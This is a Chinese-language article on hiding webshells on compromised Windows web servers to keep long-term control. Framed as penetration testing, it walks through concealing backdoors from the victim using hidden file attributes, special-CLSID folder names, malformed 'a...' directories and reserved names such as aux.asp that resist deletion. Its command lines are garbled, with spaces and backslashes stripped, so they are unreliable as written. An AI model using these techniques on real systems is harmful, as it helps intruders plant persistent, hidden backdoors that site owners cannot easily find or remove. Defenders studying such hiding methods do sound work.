0x01 前言
當我們進行滲透測試的過程中,拿下來一臺機器的權(quán)限,如果對這臺主機做一個長久的控制,是我們要考慮的事情.所以通過本篇文章,我們旨在告訴大家,在Windows系統(tǒng)下的一些權(quán)限維持的方法,包括了webshell的維持和木馬的可持續(xù)控制等等.
0x02 正文
2.1 隱藏文件夾隱藏Webshell
在我們進行滲透測試的過程中,如果拿到了一臺Windows主機的Webshell,可以通過創(chuàng)建隱藏文件的形式,來將我們的webshell木馬進行隱藏.典型命令如下:
attrib+s+a+h+r[目標文件夾]
這條命令的含義是將原本的文件夾添加了系統(tǒng)文件屬性、存檔文件屬性、只讀文件屬性和隱藏文件屬性
案例演示: 我們拿下了一臺Windows主機的webshell,通過中國蟻劍我們連接上去,成功進入虛擬終端. 在一句話木馬的當前目錄下創(chuàng)建新文件夾,并寫入新的木馬,繼而將含有木馬的文件夾進行隱藏. 命令如下:
mkdirtmp#創(chuàng)建隱藏文件夾,此時尚未隱藏
cdtmp#進入創(chuàng)建的文件夾
echo^>>shell.php#寫入Webshell至tmp目錄下
cd../#返回上一級目錄
attrib+s+a+h+rtmp#對創(chuàng)建的文件夾進行隱藏
此時受害者在自己的目錄下是看不到我們創(chuàng)建的文件夾的(除非開啟顯示隱藏文件[默認不開啟])
此時我們進行拼接,連接上我們的Webshell,發(fā)現(xiàn)成功連接.
2.2 利用系統(tǒng)代號隱藏Webshell
創(chuàng)建一個新建文件夾,將木馬放入這個文件夾,重命名文件夾名稱為"Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}",此時會發(fā)現(xiàn)文件夾變成了我的電腦,雙擊進入的也是正常的我的電腦的頁面
通過拼接文件夾名,使用中國蟻劍進行木馬連接,例如
http://127.0.0.1/Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}/shell.php
發(fā)現(xiàn)可以成功連接到Webshell里去.
類似的可用的特殊文件名的代號還有:
我的電腦.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
回收站.{645ff040-5081-101b-9f08-00aa002f954e}
拔號網(wǎng)絡.{992CFFA0-F557-101A-88EC-00DD010CCC48}
打印機.{2227a280-3aea-1069-a2de-08002b30309d}
控制面板.{21ec2020-3aea-1069-a2dd-08002b30309d}
網(wǎng)上鄰居.{208D2C60-3AEA-1069-A2D7-08002B30309D}
2.3 畸形目錄隱藏Webshell
首先在終端里創(chuàng)建一個畸形目錄,命令如下
mkdira...
然后使用命令Copy命令將木馬移動到畸形目錄下,注意一定是命令行里移動的.
copyb.aspC:inetpubwwwroota....asp
此時訪問進入a...文件夾下,發(fā)現(xiàn)不存在b.asp.
但是可以通過中國蟻劍連接上去
并且畸形目錄無法被刪除,也就是說除非是專業(yè)人員,此木馬長久存在.
刪除方法:使用如下命令可刪除畸形目錄
rd/s/q[畸形文件夾]
2.4 利用系統(tǒng)保留名制作不死Webshell
在Windows操作系統(tǒng)中,是不能以下形式創(chuàng)建文件的,比如aux,com1,com2,prn,con,nul等.但是在cmd目錄下可以通過copy語句創(chuàng)建,這類文件無法在圖形化界面被刪除,只能在命令行中被刪除. 創(chuàng)建不死Webshell命令如下:
copyb.txt\.C:inetpubwwwrootaux.asp
但是通過中國蟻劍可以正常連上
0x03 總結(jié)
本文總結(jié)了幾種比較常見的Webshell隱藏方法,當然權(quán)限維持的方法并不局限于此,希望大家能夠有所收獲。
審核編輯 :李倩
-
木馬
+關(guān)注
關(guān)注
0文章
47瀏覽量
13304 -
Shell
+關(guān)注
關(guān)注
1文章
359瀏覽量
23192
原文標題:Windows下木馬隱藏小技巧
文章出處:【微信號:哆啦安全,微信公眾號:哆啦安全】歡迎添加關(guān)注!文章轉(zhuǎn)載請注明出處。
發(fā)布評論請先 登錄
相關(guān)推薦
評論